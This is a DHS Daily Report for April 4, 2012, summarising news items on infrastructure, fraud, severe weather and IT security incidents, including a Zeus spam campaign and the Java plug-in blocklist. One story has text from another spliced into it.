Wednesday, April 4, 2012

Complete DHS Daily Report for April 4, 2012

Daily Report

Top Stories

• The Royal Bank of Canada was sued by U.S. regulators April 2, over claims that the Toronto, Canada-based lender engaged in illegal futures trades worth hundreds of millions of dollars to garner tax benefits. – Bloomberg. See item 9 below in the Banking and Finance Sector

• Officials in Volusia County, Florida, said a single-engine plane crashed into a supermarket April 2, injuring five people, including three shoppers inside the store during the crash. – WESH 2 Orlando

18. April 3, WESH 2 Orlando – (Florida) 5 hurt when plane crashes into DeLand Publix. Police and sheriff’s officials in Volusia County, Florida, said a single-engine plane crashed into a Publix in DeLand April 2. The crash occurred at the Northgate Shopping Center, a half-mile from the DeLand Municipal Airport. DeLand fire officials said five people were injured, including three shoppers and the two people on board the plane. Two shoppers were taken to the hospital and were expected to be released April 2. The third shopper suffered burns and was taken to a different hospital, where he was listed in stable condition. The pilot and passenger on board the plane also suffered burns and were taken to the hospital. The pilot of a medical transport helicopter used at the scene said the plane was an amphibious experimental aircraft that took off from DeLand and suffered engine failure. Witnesses at the scene described seeing the plane sputter, hit the building, and burst into flames. The plane crashed in the back of the store, near the meat department, but those up front said they could still feel the heat from the fire. The National Transportation Safety Board and the Federal Aviation Administration were notified about the crash. Source:

• A former Oikos University student accused of killing seven people at the university in Oakland, California, “does not appear to be remorseful at all,” the city’s police chief said April 3. – CNN

26. April 2, CNN – (Wisconsin) Homemade bomb causes fire outside Planned Parenthood clinic. A Planned Parenthood clinic in Wisconsin was closed after a homemade bomb was placed outside the building April 1, the state organization said. The explosive device caused a small fire by the time Grand Chute fire officials arrived, the president and CEO of Planned Parenthood of Wisconsin said in a statement. No patients or staff members were at the health care center at the time. Police in Grand Chute are investigating the incident. Source:

• Students, public officials, and shoppers in Arlington, Texas, took cover April 3 as a large tornado touched ground, part of a huge complex of storms that was wreaking havoc across North Texas. The storms caused severe damage and delayed flights. – Fort Worth Star-Telegram

40. April 3, Fort Worth Star-Telegram – (Texas) Students, public officials, shoppers take cover as tornado touches down in Arlington. Students, public officials, and shoppers in Arlington, Texas, were taking cover April 3 as a large tornado touched ground, part of a huge complex of storms that was wreaking havoc across North Texas. The Parks at Arlington mall was shut down and management ordered shoppers and others into the basement. Employees at Cowboys Stadium were moved into the tunnels. Damage was also reported at nearby apartments. The Arlington Fire Department reported heavy damage near Lake Arlington and damage to the Green Oaks Nursing Home. Dallas/Fort Worth Airport told passengers to move away from glass windows and to take cover in itsstorm shelters. The Federal Aviation Administration also issued a ground stop for flights coming in and out of the airport. The first tornado was spotted near Joshua,causing damage according to a county sheriff’s department officer. Students in Burleson and Arlington were moved to safety zones. The National Weather Service said a tornado touched down in Kennedale, and media reported “extreme damage.” A funnel touched down about 2 miles east of Spinks Airport in south Tarrant County without causing damage, according to the airport manager. A second tornado warning was issued for Dallas and Ellis counties after a tornado was confirmed on the ground in Ellis County. A tornado near Lancaster in Dallas County reportedly caused power flashes and sent debris flying. Source:

• Dougherty County police found five explosive devices in a man’s car near the Georgia Power Dam in Albany, Georgia, April 1. – WALB 10 Albany (See item 47)

47. April 2, WALB 10 Albany – (Georgia) Georgia Dam explosive device suspect released on bond. A man caught with explosives near the Georgia Power Dam in Albany, Georgia, April 1, was released on bond the following day. The man was arrested after police got a tip that someone had explosives near the dam. Dougherty County Police found five explosive devices in the man’s car. The Dougherty County police captain said, “Right now we don’t have anything to indicate that he is some kind of terrorist, but we really don’t know for sure, and that’s why we are continuing to look into him and his background.” Samples of the explosive device and the chemicals used were sent to the FBI while the rest were destroyed by the Georgia Bureau of Investigation. Source:


Banking and Finance Sector

9. April 3, Bloomberg – (National; International) RBC sued by U.S. regulators over wash trades. Royal Bank of Canada (RBC) was sued April 2 by U.S. regulators over claims that the Toronto, Canada-based lender engaged in illegal futures trades worth hundreds of millions of dollars to garner tax benefits tied to equities. Canada’s biggest bank made false and misleading statements about “wash trades” from 2007 to 2010 in which affiliates traded among themselves in a way that undermined competition and price discovery on the OneChicago LLC exchange, the Commodity Futures Trading Commission (CFTC) said in a complaint filed in a New York federal court. Royal Bank enlisted affiliates to help carry out hundreds of futures transactions that were done off-exchange and then reported to OneChicago as block trades between independent affiliates, according to the CFTC. The trades, which resulted in Royal Bank not having a financial position in a market, were conducted for Canadian tax benefits tied to holding certain stocks, the CFTC said. The transactions, involving single-stock futures and narrow-based indexes, were used to hedge the risk of holding the equities, according to the statement. Between 2006 and 2010, the narrow-based index least August 2009 to August 2011, the attorney and his co-conspirators defrauded investors by removing the funds. Typically, within 1 or 2 weeks after the deposit, trades between a Toronto-based bank account and RBC Europe Ltd., a London-based bank subsidiary, represented all of the narrow-based index volume on OneChicago, the CFTC said in the complaint. Senior members of the bank’s central funding group determined the prices and contracts traded. From 2005 to 2010, RBC concealed material information and made false statements about the trades to CME Group Inc., which had regulatory oversight of the exchange, according to the CFTC. RBC’s responses to CME questions about the trades “concealed information concerning the central role” of the central funding group and the bank’s single-stock futures trades, CFTC said. The CFTC is seeking monetary penalties and an injunction against further violations, the agency said. Source:

10. April 3, Help Net Security – (International) Fake US Airways emails lead to Zeus variant. A US Airways-themed spam campaign aiming at infecting users with a variant of the Zeus banking trojan has been hitting inboxes for the last 2 weeks, according to a Kaspersky Lab researcher. This particular spam e-mail purportedly contains the confirmation code and the online reservation details needed for the users to confirm their flight reservation. However, the offered links take users to one of a number of compromised domains containing malicious javascripts that perform a number of redirections and finally land the victims on a domain hosting the BlackHole exploit kit. Once the kit exploits a vulnerability in Java, Flash Player, or Adobe Reader, a downloader that ultimately connects to a command and control server and downloads and runs the GameOver Zeus variant is installed on the machine. “At all the stages of this attack, every object — domains, links to javascripts, files with exploits, the downloader and Zeus — was frequently replaced with a new one,” the researcher said. “The domains remained ‘alive’ for nearly 12 hours, while the Zeus samples were replaced more often.” Given that the exploits, downloaders, and Zeus modifications used by the cybercriminals in this attack were detected mostly by Russian, U.S., Italian, German, and Indian Kaspersky users, the researcher speculates the spam campaign is not the only method used by these cyber crooks to spread Zeus. Source:

11. April 2, Citybizlist Baltimore – (Maryland) Maryland attorney pleads guilty in $14M construction investment scheme. An attorney pleaded guilty April 2 in Maryland, to conspiring to commit wire fraud arising from an investment fraud scheme. According to his plea agreement, the attorney and his co-conspirators targeted individuals seeking investment opportunities or commercial real estate development lending in Maryland and elsewhere, including a Bowie, Maryland hotel project. Victim investors were instructed that in order to obtain loans for commercial real estate projects, they were required to deposit large sums of money in an escrow bank account to show “liquidity.” All of the escrow agreements used to defraud the investors provided that no person other than the victims had the ability to remove the escrowed funds without permission. From at 10 11 - 7 - they withdrew the victim’s funds to pay their business and personal debts or to make “lulling” payments to other investors. They attempted to cover up the fraud by issuing false verifications of deposits and false bank statements regarding the amount of escrowed funds; falsely representing in e-mails and by phone the balance of escrow funds and the date when the investors’ money would be returned; and returning part of the victims’ investments using funds from other investors. They improperly obtained funds from investor victims in excess of $14 million. Source: Guilty-in-14M-Construction-Investment-Scheme.aspx

12. April 2, KLEW 3 Lewiston – (Idaho) Nearly 300 people fall victim to credit card fraud. Nearly 300 people in and around the Orofino, Idaho area have fallen victim to credit card fraud since the first week of February, KLEW 3 Lewiston reported April 2. According to the Orofino police chief, the victims have reported fraudulent usage, or attempted usage, of their credit card accounts with unauthorized purchase attempts. The Orofino Police Department has been working with a number of banking institutions and the U.S. Secret Service to determine the source of fraud. Together, the three departments determined Orofino’s Glenwood IGA was the common point of purchase for the compromised accounts. The police chief said IGA has been fully cooperating with law enforcement to determine the compromise. Source:

13. April 2, U.S. Department of Justice – (New Hampshire; Massachusetts) New Hampshire and Massachusetts residents convicted for promoting and using tax defier schemes. A federal jury in Worcester, Massachusetts, convicted three defendants for conspiracies to defraud the United States through the promotion and use of multiple tax fraud schemes, the Justice Department and the Internal Revenue Service (IRS) announced April 2. According to the evidence presented at trial, the three promoted a payroll scheme to employers and individuals who wanted to avoid payment of employer payroll taxes and individual payroll taxes. Approximately 150 individuals subscribed to the payroll scheme and in excess of $2.5 million in unreported wages and compensation were paid through the system. The evidence at trial also proved two of the defendants conspired to defraud the United States by promoting and operating an “underground warehouse banking” scheme which helped subscribers conceal income and assets from the IRS. As part of the banking scheme, the defendants maintained accounts at several banks and used the accounts to deposit and commingle business receipts and other funds received from subscribers in order to mask the true ownership of the funds. According to evidence presented at trial, more than $28 million in deposits were made into the various bank accounts used in the scheme. Source:

14. April 2, KIVI 6 Boise – (Idaho) Boise transient arrested for making fake money in Boise hotel room. Police in Boise, Idaho, were called April 1 by the clerk of a motel. Motel employees told officers they were concerned about the welfare of a guest who missed the checkout time and appeared unresponsive when a motel employee entered to check the room. Boise Police knocked and announced themselves, and a man answered the door. Inside the room, officers saw in plain sight a printer and a trash can with what looked like paper copies of money. Also, the motel clerk previously told officers they were holding what appeared to be a fake $5 bill the man used to pay for the room. Detectives with the Boise Police Financial Crimes unit and the U.S. Secret Service were called to the scene. The motel guest was found to be using the room and printer to manufacture counterfeit U.S. currency. It appeared to officers the suspect was making the counterfeit bills, mainly in the denominations of $5 and $20, for the last 2 to 3 days. Officers also found the fake bills were recently passed at two nearby convenience stores by the suspect. The suspect was booked on the charge of forgery. Source:

Information Technology

34. April 3, IDG News Service – (International) Mozilla adds vulnerable Java plug-in versions to Firefox blocklist. Mozilla blacklisted unpatched versions of the Java plug-in from Firefox on Windows in order to protect its users from attacks that exploit known vulnerabilities in those versions. Mozilla can add extensions or plug-ins to the Firefox add-on blocklist if they cause significant security or performance issues. Firefox installations automatically query the blocklist and notify users before disabling the targeted add-ons. “The February 2012 update to the Java Development Kit (JDK) and Java Runtime Environment (JRE) included a patch to correct a critical vulnerability that can permit the loading of arbitrary code on an end-user’s computer,” Mozilla’s channel manager said April 2. “This vulnerability — present in the older versions of the JDK and JRE — is actively being exploited, and is a potential risk to users,” he said. “To mitigate this risk, we have added affected versions of the Java plugin for Windows (Version 6 Update 30 and below as well as Version 7 Update 2 and below) to Firefox’s blocklist.” He did not specify the vulnerability being actively exploited, but security companies have warned during the past several weeks that exploits for the CVE-2010-0507 Java vulnerability were being used in widespread attacks and have been incorporated into the popular Blackhole exploit toolkit. Source:

35. April 3, IDG News Service – (International) Adobe releases open source malware classification tool. Adobe Systems released a malware classification tool in order to help security incident first responders, malware analysts, and security researchers more easily identify malicious binary files. The Adobe Malware Classifier tool uses machine learning algorithms to classify Windows executable and dynamic link library files as clean, malicious, or unknown, a Adobe security engineer said. When run, the tool extracts seven key attributes from every analyzed binary file and compares them to data obtained by running the J48, J48 Graft, PART, and Ridor machine-learning algorithms on a set of 100,000 malicious programs and 16,000 clean ones, he said. Source:

36. April 3, The Register – (International) Facebook logins easily slurped from iOS, Android kit. Facebook’s iOS and Android clients do not encrypt users’ logon credentials, leaving them in a folder accessible to other apps or USB connections. A rogue application, or 2 minutes with a USB connection, is all that is needed to steal the temporary credentials from either device. In the case of iOS, someone can even take the data from a backup, enabling the hacker to attach to a Facebook account and access applications. This exploit comes from a reader of The Register, who came across the file and tested it to see if it was easy enough to pretend to be someone else. After developing a proof-of-concept, which lifted “several thousand” IDs, the reader deleted the collected data and reported the matter to Facebook. It appears Facebook is already aware of the problem and working on a fix — though it will not say how long it is going to take or what users should do in the meantime. Source:

37. April 2, – (International) Anonymous and Lulzec hackers evolving to

target corporate data to cause financial pain. Hacker groups Anonymous and LulzSec are changing tactics to target firms’ corporate data in order to hurt them financially, rather than cause embarrassment by affecting Web sites, according to new research from security firm Imperva. In its latest Hacker Intelligence Initiative report, Imperva researchers said they saw a marked change in hacktivists’ behavior, with groups moving away from defacing Web sites or knocking them offline to stealing data. Specifically, Imperva researchers reported discovering that 21 percent of all recorded incidents from June to November 2011 saw hackers mounting local and remote file inclusion (RFI/LFI) attacks. The statistic was widely attributed to hacktivists, such as the Anonymous collective and LulzSec group. A form of attack that targets PHP coding, the use of RFI/LFI techniques allows hackers to steal data by manipulating the company’s Web server, and indicates a step away from their usual tendency to target companies’ Web sites with distributed denial-of-service assaults. Source:

38. April 2, SecurityWeek – (International) Dozens of Alexa top 25,000 domains serving malware to millions, firm says. An analysis of the Alexa top 25,000 most popular domains revealed 58 were serving malicious content during the month of February — translating to more than 10.5 million users being targeted by malware, according to research by Barracuda Networks. The firm also found that on average, 2 of the Alexa top 25,000 domains serve malicious content each day. In addition, Alexa top-ranked domains served malicious content 23 of the 29 days in February, underscoring that the problem is persistent, Barracuda Networks argued. Almost all of the sites hitting visitors with malicious content were a year or more old, and more than half of the sites were older than 5 years. That means attackers were specifically utilizing well-established, long-lived sites for their drive-by download operations. Source:

For another story, see item 10 above in the Banking and Finance Sector

Communications Sector

39. April 2, WMBD 31 Peoria – (Illinois) Cell tower outage has Bradley students searching for connection. Sprint customers on Bradley University’s campus in Peoria, Illinois, were having trouble making phone calls April 2. A cell tower outage in Peoria was causing Sprint customers to lose service. A Bradley spokesperson said the problem started the week of March 26. He said Sprint told him the problem is affecting various areas across central Illinois. A Bradley spokesperson said that Sprint has told him the tower would be fixed April 6. Source: